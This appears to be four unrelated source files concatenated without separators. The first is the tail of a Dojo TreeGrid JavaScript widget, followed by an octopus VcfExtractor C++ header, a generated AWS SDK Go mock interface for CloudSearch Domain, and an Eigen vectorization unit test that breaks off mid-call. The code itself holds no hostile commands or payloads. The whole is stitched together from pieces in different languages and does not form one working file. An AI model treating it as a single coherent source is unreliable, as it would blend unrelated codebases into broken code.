_clearData: function() {
this.inherited(arguments);
this._by_idty_paths = {};
},
_cleanupExpandoCache: function(index, identity, item){},
_addItem: function(item, index, noUpdate, dontUpdateRoot){
// add our root items to the root of the model's children
// list since we don't query the model
if(!dontUpdateRoot && this.model && array.indexOf(this.model.root.children, item) == -1){
this.model.root.children[index] = item;
}
this.inherited(arguments);
},
getItem: function(/*integer|Array|String*/ idx){
// summary:
// overridden so that you can pass in a '/' delimited string of indexes to get the
// item based off its path...that is, passing in "1/3/2" will get the
// 3rd (0-based) child from the 4th child of the 2nd top-level item.
var isArray = lang.isArray(idx);
if(lang.isString(idx) && idx.indexOf('/')){
idx = idx.split('/');
isArray = true;
}
if(isArray && idx.length == 1){
idx = idx[0];
isArray = false;
}
if(!isArray){
return DataGrid.prototype.getItem.call(this, idx);
}
var s = this.store;
var itm = DataGrid.prototype.getItem.call(this, idx[0]);
var cf, i, il, j, jl;
if(this.aggregator){
cf = this.aggregator.childFields||[];
if(cf){
for(i = 0; i < idx.length - 1 && itm; i++){
if(cf[i]){
itm = (s.getValues(itm, cf[i])||[])[idx[i + 1]];
}else{
itm = null;
}
}
}
}else if(this.treeModel){
cf = this.treeModel.childrenAttrs||[];
if(cf&&itm){
for(i=1, il=idx.length; (i<il) && itm; i++) {
for(j=0, jl=cf.length; j<jl; j++) {
if(cf[j]){
itm = (s.getValues(itm, cf[j])||[])[idx[i]];
}else{
itm = null;
}
if(itm){ break; }
}
}
}
}
return itm || null;
},
_getItemIndex: function(item, isDeleted){
if(!isDeleted && !this.store.isItem(item)){
return -1;
}
var idx = this.inherited(arguments);
if(idx == -1){
var idty = this.store.getIdentity(item);
return this._by_idty_paths[idty] || -1;
}
return idx;
},
postMixInProperties: function(){
if(this.treeModel && !("defaultOpen" in this.params)){
// Default open to false for tree models, true for other tree
// grids.
this.defaultOpen = false;
}
var def = this.defaultOpen;
this.openAtLevels = array.map(this.openAtLevels, function(l){
if(typeof l == "string"){
switch(l.toLowerCase()){
case "true":
return true;
break;
case "false":
return false;
break;
default:
var r = parseInt(l, 10);
if(isNaN(r)){
return def;
}
return r;
break;
}
}
return l;
});
this._by_idty_paths = {};
this.inherited(arguments);
},
postCreate: function(){
this.inherited(arguments);
if(this.treeModel){
this._setModel(this.treeModel);
}
},
setModel: function(treeModel){
this._setModel(treeModel);
this._refresh(true);
},
_setModel: function(treeModel){
if(treeModel && (!ForestStoreModel || !(treeModel instanceof ForestStoreModel))){
throw new Error("dojox.grid.TreeGrid: treeModel must be an instance of dijit.tree.ForestStoreModel");
}
this.treeModel = treeModel;
domClass.toggle(this.domNode, "dojoxGridTreeModel", this.treeModel ? true : false);
this._setQuery(treeModel ? treeModel.query : null);
this._setStore(treeModel ? treeModel.store : null);
},
createScroller: function(){
this.inherited(arguments);
this.scroller._origDefaultRowHeight = this.scroller.defaultRowHeight;
},
createManagers: function(){
// summary:
// create grid managers for various tasks including rows, focus, selection, editing
// row manager
this.rows = new _RowManager(this);
// focus manager
this.focus = new _TreeFocusManager(this);
// edit manager
this.edit = new _EditManager(this);
},
_setStore: function(store){
this.inherited(arguments);
if(this.treeModel&&!this.treeModel.root.children){
this.treeModel.root.children = [];
}
if(this.aggregator){
this.aggregator.store = store;
}
},
getDefaultOpenState: function(cellDef, item){
// summary:
// Returns the default open state for the given definition and item
// It reads from the openAtLevels and defaultOpen values of the
// grid to calculate if the given item should default to open or
// not.
var cf;
var store = this.store;
if(this.treeModel){ return this.defaultOpen; }
if(!cellDef || !store || !store.isItem(item) ||
!(cf = this.aggregator.childFields[cellDef.level])){
return this.defaultOpen;
}
if(this.openAtLevels.length > cellDef.level){
var dVal = this.openAtLevels[cellDef.level];
if(typeof dVal == "boolean"){
return dVal;
}else if(typeof dVal == "number"){
return (store.getValues(item, cf).length <= dVal);
}
}
return this.defaultOpen;
},
onStyleRow: function(row){
if(!this.layout._isCollapsable){
this.inherited(arguments);
return;
}
var base = domAttr.get(row.node, 'dojoxTreeGridBaseClasses');
if(base){
row.customClasses = base;
}
var i = row;
var tagName = i.node.tagName.toLowerCase();
i.customClasses += (i.odd?" dojoxGridRowOdd":"") +
(i.selected&&tagName=='tr'?" dojoxGridRowSelected":"") +
(i.over&&tagName=='tr'?" dojoxGridRowOver":"");
this.focus.styleRow(i);
this.edit.styleRow(i);
},
styleRowNode: function(inRowIndex, inRowNode){
if(inRowNode){
if(inRowNode.tagName.toLowerCase() == 'div' && this.aggregator){
query("tr[dojoxTreeGridPath]", inRowNode).forEach(function(rowNode){
this.rows.styleRowNode(domAttr.get(rowNode, 'dojoxTreeGridPath'), rowNode);
},this);
}
this.rows.styleRowNode(inRowIndex, inRowNode);
}
},
onCanSelect: function(inRowIndex){
var nodes = query("tr[dojoxTreeGridPath='" + inRowIndex + "']", this.domNode);
if(nodes.length){
if(domClass.contains(nodes[0], 'dojoxGridSummaryRow')){
return false;
}
}
return this.inherited(arguments);
},
onKeyDown: function(e){
if(e.altKey || e.metaKey){
return;
}
switch(e.keyCode){
case keys.UP_ARROW:
if(!this.edit.isEditing() && this.focus.rowIndex != "0"){
event.stop(e);
this.focus.move(-1, 0);
}
break;
case keys.DOWN_ARROW:
var currPath = new TreePath(this.focus.rowIndex, this);
var lastPath = new TreePath(this.rowCount-1, this);
lastPath = lastPath.lastChild(true);
if(!this.edit.isEditing() && currPath.toString() != lastPath.toString()){
event.stop(e);
this.focus.move(1, 0);
}
break;
default:
this.inherited(arguments);
break;
}
},
canEdit: function(inCell, inRowIndex){
var node = inCell.getNode(inRowIndex);
return node && this._canEdit;
},
doApplyCellEdit: function(inValue, inRowIndex, inAttrName){
var item = this.getItem(inRowIndex);
var oldValue = this.store.getValue(item, inAttrName);
if(typeof oldValue == 'number'){
inValue = isNaN(inValue) ? inValue : parseFloat(inValue);
}else if(typeof oldValue == 'boolean'){
inValue = inValue == 'true' ? true : inValue == 'false' ? false : inValue;
}else if(oldValue instanceof Date){
var asDate = new Date(inValue);
inValue = isNaN(asDate.getTime()) ? inValue : asDate;
}
this.store.setValue(item, inAttrName, inValue);
this.onApplyCellEdit(inValue, inRowIndex, inAttrName);
}
});
TreeGrid.markupFactory = function(props, node, ctor, cellFunc){
var widthFromAttr = function(n){
var w = domAttr.get(n, "width")||"auto";
if((w != "auto")&&(w.slice(-2) != "em")&&(w.slice(-1) != "%")){
w = parseInt(w, 10)+"px";
}
return w;
};
var cellsFromMarkup = function(table){
var rows;
// Don't support colgroup on our grid - single view, single row only
if(table.nodeName.toLowerCase() == "table" &&
query("> colgroup", table).length === 0 &&
(rows = query("> thead > tr", table)).length == 1){
var tr = rows[0];
return query("> th", rows[0]).map(function(th){
// Grab type and field (the only ones that are shared
var cell = {
type: lang.trim(domAttr.get(th, "cellType")||""),
field: lang.trim(domAttr.get(th, "field")||"")
};
if(cell.type){
cell.type = lang.getObject(cell.type);
}
var subTable = query("> table", th)[0];
if(subTable){
// If we have a subtable, we are an aggregate and a summary cell
cell.name = "";
cell.children = cellsFromMarkup(subTable);
if(domAttr.has(th, "itemAggregates")){
cell.itemAggregates = array.map(domAttr.get(th, "itemAggregates").split(","), function(v){
return lang.trim(v);
});
}else{
cell.itemAggregates = [];
}
if(domAttr.has(th, "aggregate")){
cell.aggregate = domAttr.get(th, "aggregate");
}
cell.type = cell.type || dojox.grid.cells.SubtableCell;
}else{
// Grab our other stuff we need (mostly what's in the normal
// Grid)
cell.name = lang.trim(domAttr.get(th, "name")||th.innerHTML);
if(domAttr.has(th, "width")){
cell.width = widthFromAttr(th);
}
if(domAttr.has(th, "relWidth")){
cell.relWidth = window.parseInt(domAttr.get(th, "relWidth"), 10);
}
if(domAttr.has(th, "hidden")){
cell.hidden = domAttr.get(th, "hidden") == "true";
}
cell.field = cell.field||cell.name;
DataGrid.cell_markupFactory(cellFunc, th, cell);
cell.type = cell.type || dojox.grid.cells.Cell;
}
if(cell.type && cell.type.markupFactory){
cell.type.markupFactory(th, cell);
}
return cell;
});
}
return [];
};
var rows;
if( !props.structure ){
var row = cellsFromMarkup(node);
if(row.length){
// Set our structure here - so that we don't try and set it in the
// markup factory
props.structure = [{__span: Infinity, cells:[row]}];
}
}
return DataGrid.markupFactory(props, node, ctor, cellFunc);
};
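// Usage sketch (an assumption, not from this file): like other dojox grids,
// a TreeGrid is typically created programmatically and started up, e.g.:
//
//   require(["dojox/grid/TreeGrid"], function(TreeGrid){
//     var grid = new TreeGrid({
//       store: myStore,                      // a dojo.data store (assumed)
//       structure: [{cells: [[ /* ... */ ]]}],
//       defaultOpen: false
//     }, "gridNode");
//     grid.startup();
//   });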
return TreeGrid;
});
// Copyright (c) 2015-2020 Daniel Cooke
// Use of this source code is governed by the MIT license that can be found in the LICENSE file.
#ifndef vcf_extractor_hpp
#define vcf_extractor_hpp
#include <vector>
#include <memory>
#include <boost/filesystem.hpp>
#include <boost/optional.hpp>
#include "io/variant/vcf.hpp"
#include "core/types/variant.hpp"
#include "variant_generator.hpp"
namespace octopus {
class GenomicRegion;
namespace coretools {
class VcfExtractor : public VariantGenerator
{
public:
struct Options
{
Variant::MappingDomain::Size max_variant_size = 100;
bool extract_filtered = false;
boost::optional<VcfRecord::QualityType> min_quality = boost::none;
bool split_complex = false;
};
VcfExtractor() = delete;
VcfExtractor(std::unique_ptr<VcfReader> reader);
VcfExtractor(std::unique_ptr<VcfReader> reader, Options options);
VcfExtractor(const VcfExtractor&) = default;
VcfExtractor& operator=(const VcfExtractor&) = default;
VcfExtractor(VcfExtractor&&) = default;
VcfExtractor& operator=(VcfExtractor&&) = default;
~VcfExtractor() override = default;
private:
std::unique_ptr<VariantGenerator> do_clone() const override;
std::vector<Variant> do_generate(const RegionSet& regions) const override;
std::string name() const override;
mutable std::shared_ptr<VcfReader> reader_;
Options options_;
std::vector<Variant> fetch_variants(const GenomicRegion& region) const;
bool is_good(const VcfRecord& record) const;
};
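// Usage sketch (illustrative only; how a VcfReader is constructed is
// project-specific and assumed here): extract variants with quality of at
// least 20, skipping filtered records.
//
//   using namespace octopus::coretools;
//   VcfExtractor::Options options {};
//   options.min_quality = 20;
//   options.extract_filtered = false;
//   VcfExtractor extractor {std::make_unique<VcfReader>("calls.vcf.gz"), options};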
} // namespace coretools
} // namespace octopus
#endif
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
// Package cloudsearchdomainiface provides an interface to enable mocking the Amazon CloudSearch Domain service client
// for testing your code.
//
// It is important to note that this interface will have breaking changes
// when the service model is updated and adds new API operations, paginators,
// and waiters.
package cloudsearchdomainiface
import (
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/request"
"github.com/aws/aws-sdk-go/service/cloudsearchdomain"
)
// CloudSearchDomainAPI provides an interface to enable mocking the
// cloudsearchdomain.CloudSearchDomain service client's API operation,
// paginators, and waiters. This makes unit testing your code that calls out
// to the SDK's service client's calls easier.
//
// The best way to use this interface is so the SDK's service client's calls
// can be stubbed out for unit testing your code with the SDK without needing
// to inject custom request handlers into the SDK's request pipeline.
//
// // myFunc uses an SDK service client to make a request to
// // Amazon CloudSearch Domain.
// func myFunc(svc cloudsearchdomainiface.CloudSearchDomainAPI) bool {
// // Make svc.Search request
// }
//
// func main() {
// sess := session.New()
// svc := cloudsearchdomain.New(sess)
//
// myFunc(svc)
// }
//
// In your _test.go file:
//
// // Define a mock struct to be used in your unit tests of myFunc.
// type mockCloudSearchDomainClient struct {
// cloudsearchdomainiface.CloudSearchDomainAPI
// }
// func (m *mockCloudSearchDomainClient) Search(input *cloudsearchdomain.SearchInput) (*cloudsearchdomain.SearchOutput, error) {
// // mock response/functionality
// }
//
// func TestMyFunc(t *testing.T) {
// // Setup Test
// mockSvc := &mockCloudSearchDomainClient{}
//
// myfunc(mockSvc)
//
// // Verify myFunc's functionality
// }
//
// It is important to note that this interface will have breaking changes
// when the service model is updated and adds new API operations, paginators,
// and waiters. It's suggested to use the pattern above for testing, or to use
// tooling to generate mocks to satisfy the interfaces.
type CloudSearchDomainAPI interface {
Search(*cloudsearchdomain.SearchInput) (*cloudsearchdomain.SearchOutput, error)
SearchWithContext(aws.Context, *cloudsearchdomain.SearchInput, ...request.Option) (*cloudsearchdomain.SearchOutput, error)
SearchRequest(*cloudsearchdomain.SearchInput) (*request.Request, *cloudsearchdomain.SearchOutput)
Suggest(*cloudsearchdomain.SuggestInput) (*cloudsearchdomain.SuggestOutput, error)
SuggestWithContext(aws.Context, *cloudsearchdomain.SuggestInput, ...request.Option) (*cloudsearchdomain.SuggestOutput, error)
SuggestRequest(*cloudsearchdomain.SuggestInput) (*request.Request, *cloudsearchdomain.SuggestOutput)
UploadDocuments(*cloudsearchdomain.UploadDocumentsInput) (*cloudsearchdomain.UploadDocumentsOutput, error)
UploadDocumentsWithContext(aws.Context, *cloudsearchdomain.UploadDocumentsInput, ...request.Option) (*cloudsearchdomain.UploadDocumentsOutput, error)
UploadDocumentsRequest(*cloudsearchdomain.UploadDocumentsInput) (*request.Request, *cloudsearchdomain.UploadDocumentsOutput)
}
var _ CloudSearchDomainAPI = (*cloudsearchdomain.CloudSearchDomain)(nil)
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2015 Gael Guennebaud <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#ifdef EIGEN_TEST_PART_1
#define EIGEN_UNALIGNED_VECTORIZE 1
#endif
#ifdef EIGEN_TEST_PART_2
#define EIGEN_UNALIGNED_VECTORIZE 0
#endif
#ifdef EIGEN_DEFAULT_TO_ROW_MAJOR
#undef EIGEN_DEFAULT_TO_ROW_MAJOR
#endif
#define EIGEN_DEBUG_ASSIGN
#include "main.h"
#include <typeinfo>
using internal::demangle_flags;
using internal::demangle_traversal;
using internal::demangle_unrolling;
template<typename Dst, typename Src>
bool test_assign(const Dst&, const Src&, int traversal, int unrolling)
{
typedef internal::copy_using_evaluator_traits<internal::evaluator<Dst>,internal::evaluator<Src>, internal::assign_op<typename Dst::Scalar,typename Src::Scalar> > traits;
bool res = traits::Traversal==traversal;
if(unrolling==InnerUnrolling+CompleteUnrolling)
res = res && (int(traits::Unrolling)==InnerUnrolling || int(traits::Unrolling)==CompleteUnrolling);
else
res = res && int(traits::Unrolling)==unrolling;
if(!res)
{
std::cerr << "Src: " << demangle_flags(Src::Flags) << std::endl;
std::cerr << " " << demangle_flags(internal::evaluator<Src>::Flags) << std::endl;
std::cerr << "Dst: " << demangle_flags(Dst::Flags) << std::endl;
std::cerr << " " << demangle_flags(internal::evaluator<Dst>::Flags) << std::endl;
traits::debug();
std::cerr << " Expected Traversal == " << demangle_traversal(traversal)
<< " got " << demangle_traversal(traits::Traversal) << "\n";
std::cerr << " Expected Unrolling == " << demangle_unrolling(unrolling)
<< " got " << demangle_unrolling(traits::Unrolling) << "\n";
}
return res;
}
template<typename Dst, typename Src>
bool test_assign(int traversal, int unrolling)
{
typedef internal::copy_using_evaluator_traits<internal::evaluator<Dst>,internal::evaluator<Src>, internal::assign_op<typename Dst::Scalar,typename Src::Scalar> > traits;
bool res = traits::Traversal==traversal && traits::Unrolling==unrolling;
if(!res)
{
std::cerr << "Src: " << demangle_flags(Src::Flags) << std::endl;
std::cerr << " " << demangle_flags(internal::evaluator<Src>::Flags) << std::endl;
std::cerr << "Dst: " << demangle_flags(Dst::Flags) << std::endl;
std::cerr << " " << demangle_flags(internal::evaluator<Dst>::Flags) << std::endl;
traits::debug();
std::cerr << " Expected Traversal == " << demangle_traversal(traversal)
<< " got " << demangle_traversal(traits::Traversal) << "\n";
std::cerr << " Expected Unrolling == " << demangle_unrolling(unrolling)
<< " got " << demangle_unrolling(traits::Unrolling) << "\n";
}
return res;
}
template<typename Xpr>
bool test_redux(const Xpr&, int traversal, int unrolling)
{
typedef typename Xpr::Scalar Scalar;
typedef internal::redux_traits<internal::scalar_sum_op<Scalar,Scalar>,internal::redux_evaluator<Xpr> > traits;
bool res = traits::Traversal==traversal && traits::Unrolling==unrolling;
if(!res)
{
std::cerr << demangle_flags(Xpr::Flags) << std::endl;
std::cerr << demangle_flags(internal::evaluator<Xpr>::Flags) << std::endl;
traits::debug();
std::cerr << " Expected Traversal == " << demangle_traversal(traversal)
<< " got " << demangle_traversal(traits::Traversal) << "\n";
std::cerr << " Expected Unrolling == " << demangle_unrolling(unrolling)
<< " got " << demangle_unrolling(traits::Unrolling) << "\n";
}
return res;
}
template<typename Scalar, bool Enable = internal::packet_traits<Scalar>::Vectorizable>
struct vectorization_logic
{
typedef internal::packet_traits<Scalar> PacketTraits;
typedef typename internal::packet_traits<Scalar>::type PacketType;
typedef typename internal::unpacket_traits<PacketType>::half HalfPacketType;
enum {
PacketSize = internal::unpacket_traits<PacketType>::size,
HalfPacketSize = internal::unpacket_traits<HalfPacketType>::size
};
static void run()
{
typedef Matrix<Scalar,PacketSize,1> Vector1;
typedef Matrix<Scalar,Dynamic,1> VectorX;
typedef Matrix<Scalar,Dynamic,Dynamic> MatrixXX;
typedef Matrix<Scalar,PacketSize,PacketSize> Matrix11;
typedef Matrix<Scalar,2*PacketSize,2*PacketSize> Matrix22;
typedef Matrix<Scalar,(Matrix11::Flags&RowMajorBit)?16:4*PacketSize,(Matrix11::Flags&RowMajorBit)?4*PacketSize:16> Matrix44;
typedef Matrix<Scalar,(Matrix11::Flags&RowMajorBit)?16:4*PacketSize,(Matrix11::Flags&RowMajorBit)?4*PacketSize:16,DontAlign|EIGEN_DEFAULT_MATRIX_STORAGE_ORDER_OPTION> Matrix44u;
typedef Matrix<Scalar,4*PacketSize,4*PacketSize,ColMajor> Matrix44c;
typedef Matrix<Scalar,4*PacketSize,4*PacketSize,RowMajor> Matrix44r;
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 2 : PacketSize==2 ? 1 : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 2 : PacketSize==4 ? 2 : PacketSize==2 ? 2 : /*PacketSize==1 ?*/ 1)
> Matrix1;
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 2 : PacketSize==2 ? 1 : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 2 : PacketSize==4 ? 2 : PacketSize==2 ? 2 : /*PacketSize==1 ?*/ 1),
DontAlign|((Matrix1::Flags&RowMajorBit)?RowMajor:ColMajor)> Matrix1u;
// this type is made such that it can only be vectorized when viewed as a linear 1D vector
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 6 : PacketSize==2 ? ((Matrix11::Flags&RowMajorBit)?2:3) : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 6 : PacketSize==4 ? 2 : PacketSize==2 ? ((Matrix11::Flags&RowMajorBit)?3:2) : /*PacketSize==1 ?*/ 3)
> Matrix3;
#if !EIGEN_GCC_AND_ARCH_DOESNT_WANT_STACK_ALIGNMENT
VERIFY(test_assign(Vector1(),Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1()+Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().cwiseProduct(Vector1()),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().template cast<Scalar>(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1()+Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().cwiseProduct(Vector1()),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix44(),Matrix44()+Matrix44(),
InnerVectorizedTraversal,InnerUnrolling));
VERIFY(test_assign(Matrix44u(),Matrix44()+Matrix44(),
EIGEN_UNALIGNED_VECTORIZE ? InnerVectorizedTraversal : LinearTraversal,
EIGEN_UNALIGNED_VECTORIZE ? InnerUnrolling : NoUnrolling));
VERIFY(test_assign(Matrix1(),Matrix1()+Matrix1(),
(Matrix1::InnerSizeAtCompileTime % PacketSize)==0 ? InnerVectorizedTraversal : LinearVectorizedTraversal,
CompleteUnrolling));
VERIFY(test_assign(Matrix1u(),Matrix1()+Matrix1(),
EIGEN_UNALIGNED_VECTORIZE ? ((Matrix1::InnerSizeAtCompileTime % PacketSize)==0 ? InnerVectorizedTraversal : LinearVectorizedTraversal)
: LinearTraversal, CompleteUnrolling));
VERIFY(test_assign(Matrix44c().col(1),Matrix44c().col(2)+Matrix44c().col(3),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix44r().row(2),Matrix44r().row(1)+Matrix44r().row(1),
InnerVectorizedTraversal,CompleteUnrolling));
if(PacketSize>1)
{
typedef Matrix<Scalar,3,3,ColMajor> Matrix33c;
typedef Matrix<Scalar,3,1,ColMajor> Vector3;
VERIFY(test_assign(Matrix33c().row(2),Matrix33c().row(1)+Matrix33c().row(1),
LinearTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector3(),Vector3()+Vector3(),
EIGEN_UNALIGNED_VECTORIZE ? (HalfPacketSize==1 ? InnerVectorizedTraversal : LinearVectorizedTraversal) : (HalfPacketSize==1 ? InnerVectorizedTraversal : LinearTraversal), CompleteUnrolling));
VERIFY(test_assign(Matrix33c().col(0),Matrix33c().col(1)+Matrix33c().col(1),
EIGEN_UNALIGNED_VECTORIZE ? (HalfPacketSize==1 ? InnerVectorizedTraversal : LinearVectorizedTraversal) : (HalfPacketSize==1 ? SliceVectorizedTraversal : LinearTraversal),
((!EIGEN_UNALIGNED_VECTORIZE) && HalfPacketSize==1) ? NoUnrolling : CompleteUnrolling));
VERIFY(test_assign(Matrix3(),Matrix3().cwiseProduct(Matrix3()),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix<Scalar,17,17>(),Matrix<Scalar,17,17>()+Matrix<Scalar,17,17>(),
HalfPacketSize==1 ? InnerVectorizedTraversal :
EIGEN_UNALIGNED_VECTORIZE ? LinearVectorizedTraversal :
LinearTraversal,
NoUnrolling));
VERIFY(test_assign(Matrix11(), Matrix11()+Matrix11(),InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix11(),Matrix<Scalar,17,17>().template block<PacketSize,PacketSize>(2,3)+Matrix<Scalar,17,17>().template block<PacketSize,PacketSize>(8,4),
(EIGEN_UNALIGNED_VECTORIZE) ? InnerVectorizedTraversal : DefaultTraversal, CompleteUnrolling|InnerUnrolling));
VERIFY(test_assign(Vector1(),Matrix11()*Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix11(),Matrix11().lazyProduct(Matrix11()),
InnerVectorizedTraversal,InnerUnrolling+CompleteUnrolling));
}
VERIFY(test_redux(Vector1(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix<Scalar,PacketSize,3>(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix3(),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix44(),
LinearVectorizedTraversal,NoUnrolling));
VERIFY(test_redux(Matrix44().template block<(Matrix1::Flags&RowMajorBit)?4:PacketSize,(Matrix1::Flags&RowMajorBit)?PacketSize:4>(1,2),
DefaultTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix44c().template block<2*PacketSize,1>(1,2),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix44r().template block<1,2*PacketSize>(2,1),
LinearVectorizedTraversal,CompleteUnrolling));
VERIFY((test_assign<
Map<Matrix22, AlignedMax, OuterStride<3*PacketSize> >,
Matrix22
>(InnerVectorizedTraversal,CompleteUnrolling)));
VERIFY((test_assign<
Map<Matrix<Scalar,EIGEN_PLAIN_ENUM_MAX(2,PacketSize),EIGEN_PLAIN_ENUM_MAX(2,PacketSize)>, AlignedMax, InnerStride<3*PacketSize> >,
Matrix<Scalar,EIGEN_PLAIN_ENUM_MAX(2,PacketSize),EIGEN_PLAIN_ENUM_MAX(2,PacketSize)>
>(DefaultTraversal,PacketSize>=8?InnerUnrolling:CompleteUnrolling)));
VERIFY((test_assign(Matrix11(), Matrix<Scalar,PacketSize,EIGEN_PLAIN_ENUM_MIN(2,PacketSize)>()*Matrix<Scalar,EIGEN_PLAIN_ENUM_MIN(2,PacketSize),PacketSize>(),
InnerVectorizedTraversal, CompleteUnrolling)));
#endif
VERIFY(test_assign(MatrixXX(10,10),MatrixXX(20,20).block(10,10,2,3),
SliceVectorizedTraversal,NoUnrolling));
VERIFY(test_redux(VectorX(10),
LinearVectorizedTraversal,NoUnrolling));
}
};
template<typename Scalar> struct vectorization_logic<Scalar,false>
{
static void run() {}
};
template<typename Scalar, bool Enable = !internal::is_same<typename internal::unpacket_traits<typename internal::packet_traits<Scalar>::type>::half,
typename internal::packet_traits<Scalar>::type>::value >
struct vectorization_logic_half
{
typedef internal::packet_traits<Scalar> PacketTraits;
typedef typename internal::unpacket_traits<typename internal::packet_traits<Scalar>::type>::half PacketType;
enum {
PacketSize = internal::unpacket_traits<PacketType>::size
};
static void run()
{
typedef Matrix<Scalar,PacketSize,1> Vector1;
typedef Matrix<Scalar,PacketSize,PacketSize> Matrix11;
typedef Matrix<Scalar,5*PacketSize,7,ColMajor> Matrix57;
typedef Matrix<Scalar,3*PacketSize,5,ColMajor> Matrix35;
typedef Matrix<Scalar,5*PacketSize,7,DontAlign|ColMajor> Matrix57u;
// typedef Matrix<Scalar,(Matrix11::Flags&RowMajorBit)?16:4*PacketSize,(Matrix11::Flags&RowMajorBit)?4*PacketSize:16> Matrix44;
// typedef Matrix<Scalar,(Matrix11::Flags&RowMajorBit)?16:4*PacketSize,(Matrix11::Flags&RowMajorBit)?4*PacketSize:16,DontAlign|EIGEN_DEFAULT_MATRIX_STORAGE_ORDER_OPTION> Matrix44u;
// typedef Matrix<Scalar,4*PacketSize,4*PacketSize,ColMajor> Matrix44c;
// typedef Matrix<Scalar,4*PacketSize,4*PacketSize,RowMajor> Matrix44r;
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 2 : PacketSize==2 ? 1 : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 2 : PacketSize==4 ? 2 : PacketSize==2 ? 2 : /*PacketSize==1 ?*/ 1)
> Matrix1;
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 2 : PacketSize==2 ? 1 : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 2 : PacketSize==4 ? 2 : PacketSize==2 ? 2 : /*PacketSize==1 ?*/ 1),
DontAlign|((Matrix1::Flags&RowMajorBit)?RowMajor:ColMajor)> Matrix1u;
// this type is made such that it can only be vectorized when viewed as a linear 1D vector
typedef Matrix<Scalar,
(PacketSize==8 ? 4 : PacketSize==4 ? 6 : PacketSize==2 ? ((Matrix11::Flags&RowMajorBit)?2:3) : /*PacketSize==1 ?*/ 1),
(PacketSize==8 ? 6 : PacketSize==4 ? 2 : PacketSize==2 ? ((Matrix11::Flags&RowMajorBit)?3:2) : /*PacketSize==1 ?*/ 3)
> Matrix3;
#if !EIGEN_GCC_AND_ARCH_DOESNT_WANT_STACK_ALIGNMENT
VERIFY(test_assign(Vector1(),Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1()+Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().template segment<PacketSize>(0).derived(),
EIGEN_UNALIGNED_VECTORIZE ? InnerVectorizedTraversal : LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Scalar(2.1)*Vector1()-Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),(Scalar(2.1)*Vector1().template segment<PacketSize>(0)-Vector1().template segment<PacketSize>(0)).derived(),
EIGEN_UNALIGNED_VECTORIZE ? InnerVectorizedTraversal : LinearVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().cwiseProduct(Vector1()),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().template cast<Scalar>(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1()+Vector1(),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Vector1(),Vector1().cwiseProduct(Vector1()),
InnerVectorizedTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix57(),Matrix57()+Matrix57(),
InnerVectorizedTraversal,InnerUnrolling));
VERIFY(test_assign(Matrix57u(),Matrix57()+Matrix57(),
EIGEN_UNALIGNED_VECTORIZE ? InnerVectorizedTraversal : LinearTraversal,
EIGEN_UNALIGNED_VECTORIZE ? InnerUnrolling : NoUnrolling));
VERIFY(test_assign(Matrix1u(),Matrix1()+Matrix1(),
EIGEN_UNALIGNED_VECTORIZE ? ((Matrix1::InnerSizeAtCompileTime % PacketSize)==0 ? InnerVectorizedTraversal : LinearVectorizedTraversal) : LinearTraversal,CompleteUnrolling));
if(PacketSize>1)
{
typedef Matrix<Scalar,3,3,ColMajor> Matrix33c;
VERIFY(test_assign(Matrix33c().row(2),Matrix33c().row(1)+Matrix33c().row(1),
LinearTraversal,CompleteUnrolling));
VERIFY(test_assign(Matrix33c().col(0),Matrix33c().col(1)+Matrix33c().col(1),
